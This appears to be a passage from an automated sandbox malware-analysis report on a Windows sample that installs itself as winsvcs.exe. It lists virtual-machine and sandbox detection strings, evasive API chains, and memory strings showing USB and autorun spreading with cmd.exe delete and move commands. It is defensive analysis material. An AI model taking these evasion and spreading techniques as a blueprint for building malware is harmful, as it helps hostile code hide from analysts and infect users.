Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: vboxservice.exe vboxservice.exe vboxtray.exe vboxcontrol.exe vmwareservice.exe vmwaretray.exe vmtoolsd.exe vmwareuser.exe		0_2_0040317D
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: vboxservice.exe vboxservice.exe vboxtray.exe vboxcontrol.exe vmwareservice.exe vmwaretray.exe vmtoolsd.exe vmwareuser.exe		6_2_0040317D

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_0-13088
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_0-13088
Source: C:\Windows\94000696690303050\winsvcs.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_6-13088
Source: C:\Windows\94000696690303050\winsvcs.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_6-13088

Found evasive API chain (may stop execution after checking volume information)

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Evasive API call chain: GetVolumeInformation,DecisionNodes,Sleep			graph_0-13158
Source: C:\Windows\94000696690303050\winsvcs.exe	Evasive API call chain: GetVolumeInformation,DecisionNodes,Sleep			graph_6-13149

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DIR_WATCH.DLL
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMUSRVC.EXE
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.0000000000759000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLH
Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: USEAUTOPLAY=1.LNK.VBS.BAT.JS.SCR.COM.JSE.CMD.PIF.JAR.DLL%LS\%S.LNKAUTORUN.INF_%LS\%S%S\_\%LS.../C RMDIR /Q /S "%LS"CMD.EXE/C MOVE /Y "%LS", "%LS"CMD.EXERB%HS%TEMP%%LS\%D%D.EXEMOZILLA/5.0 (MACINTOSH; INTEL MAC OS X 10.9; RV:25.0) GECKO/20100101 FIREFOX/25.0%LS:ZONE.IDENTIFIER%LS\%D%D.EXE%LS:ZONE.IDENTIFIERPYTHON.EXEPYTHONW.EXEPRL_CC.EXEPRL_TOOLS.EXEVMSRVC.EXEVMUSRVC.EXEXENSERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXEVBOXCONTROL.EXEVMWARESERVICE.EXEVMWARETRAY.EXETPAUTOCO
Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000678000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DIR_WATCH.DLL{J
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: USEAUTOPLAY=1.LNK.VBS.BAT.JS.SCR.COM.JSE.CMD.PIF.JAR.DLL%LS\%S.LNKAUTORUN.INF_%LS\%S%S\_\%LS.../C RMDIR /Q /S "%LS"CMD.EXE/C MOVE /Y "%LS", "%LS"CMD.EXERB%HS%TEMP%%LS\%D%D.EXEMOZILLA/5.0 (MACINTOSH; INTEL MAC OS X 10.9; RV:25.0) GECKO/20100101 FIREFOX/25.0%LS:ZONE.IDENTIFIER%LS\%D%D.EXE%LS:ZONE.IDENTIFIERPYTHON.EXEPYTHONW.EXEPRL_CC.EXEPRL_TOOLS.EXEVMSRVC.EXEVMUSRVC.EXEXENSERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXEVBOXCONTROL.EXEVMWARESERVICE.EXEVMWARETRAY.EXETPAUTOCONNSVC.EXEVMTOOLSD.EXEVMWAREUSER.EXESBIEDLL.DLLSBIEDLLX.DLLDIR_WATCH.DLLWPESPY.DLLKERNEL32.DLLWINE_GET_UNIX_FILE_NAMET.U
Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NNSVC.EXEVMTOOLSD.EXEVMWAREUSER.EXESBIEDLL.DLLSBIEDLLX.DLLDIR_WATCH.DLLWPESPY.DLLKERNEL32.DLLWINE_GET_UNIX_FILE_NAMET.U
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: XENSERVICE.EXE
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: USEAUTOPLAY=1.LNK.VBS.BAT.JS.SCR.COM.JSE.CMD.PIF.JAR.DLL%LS\%S.LNKAUTORUN.INF_%LS\%S%S\_\%LS.../C RMDIR /Q /S "%LS"CMD.EXE/C MOVE /Y "%LS", "%LS"CMD.EXERB%HS%TEMP%%LS\%D%D.EXEMOZILLA/5.0 (MACINTOSH; INTEL MAC OS X 10.9; RV:25.0) GECKO/20100101 FIREFOX/25.0%LS:ZONE.IDENTIFIER%LS\%D%D.EXE%LS:ZONE.IDENTIFIERPYTHON.EXEPYTHONW.EXEPRL_CC.EXEPRL_TOOLS.EXEVMSRVC.EXEVMUSRVC.EXEXENSERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXEVBOXCONTROL.EXEVMWARESERVICE.EXEVMWARETRAY.EXETPAUTOCO44

Source: C:\Windows\94000696690303050\winsvcs.exe

Window / User API: threadDelayed 9065

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Evaded block: after key decision

graph_0-13015

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-1054

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_0-13043
Source: C:\Windows\94000696690303050\winsvcs.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_6-13043

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_0-13567
Source: C:\Windows\94000696690303050\winsvcs.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_6-13089

Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3328	Thread sleep count: 178 > 30	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3328	Thread sleep time: -178000s >= -30000s	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3460	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3328	Thread sleep count: 9065 > 30	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3328	Thread sleep time: -9065000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_00611718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00611754h	1_2_00611718
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 006E1754h	10_2_006E1718
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_00181718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00181754h	15_2_00181718

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00402204 GetTickCount,srand,memset,memset,memset,memset,memset,memset,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,Sleep,_wfopen,fseek,ftell,fclose,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,Sleep,SetFileAttributesW,Sleep,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,Sleep,PathFileExistsW,CopyFileW,SetFileAttributesW,Sleep,PathFileExistsW,_wfopen,fprintf,fclose,SetFileAttributesW,Sleep,FindFirstFileW,memset,_snwprintf,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,memset,memset,_snwprintf,FindCloseChangeNotification,_snwprintf,SetFileAttributesW,PathFileExistsW,PathFileExistsW,GetFileAttributesW,memset,_snwprintf,ShellExecuteW,DeleteFileW,memset,_snwprintf,ShellExecuteW,FindNextFileW,FindClose,	0_2_00402204
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_004032A4 memset,memset,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFullPathNameW,CharLowerW,Sleep,Sleep,Sleep,Sleep,PathFindFileNameW,SetFileAttributesW,DeleteFileW,Sleep,CopyFileW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_004032A4
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_006129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	1_2_006129E2
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_004032A4 memset,memset,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFullPathNameW,CharLowerW,Sleep,Sleep,Sleep,Sleep,PathFindFileNameW,SetFileAttributesW,DeleteFileW,Sleep,CopyFileW,Sleep,Sleep,FindNextFileW,FindClose,	6_2_004032A4
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00402204 GetTickCount,srand,memset,memset,memset,memset,memset,memset,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,Sleep,_wfopen,fseek,ftell,fclose,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,Sleep,SetFileAttributesW,Sleep,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,Sleep,PathFileExistsW,CopyFileW,SetFileAttributesW,Sleep,PathFileExistsW,_wfopen,fprintf,fclose,SetFileAttributesW,Sleep,FindFirstFileW,memset,_snwprintf,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,memset,memset,_snwprintf,FindCloseChangeNotification,_snwprintf,SetFileAttributesW,PathFileExistsW,PathFileExistsW,GetFileAttributesW,memset,_snwprintf,ShellExecuteW,DeleteFileW,memset,_snwprintf,ShellExecuteW,FindNextFileW,FindClose,	6_2_00402204
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	10_2_006E29E2
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_001829E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	15_2_001829E2

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

0_2_00402C41

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_00425CCD VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,

0_2_00425CCD

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxtray.exe
Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco44
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: vmwaretray.exe
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmusrvc.exe
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: vmtoolsd.exe
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: XBVdJN.exe, 00000001.00000003.2333200622.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000003.2333120316.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000003.2333172802.00000000011FF000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000BFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
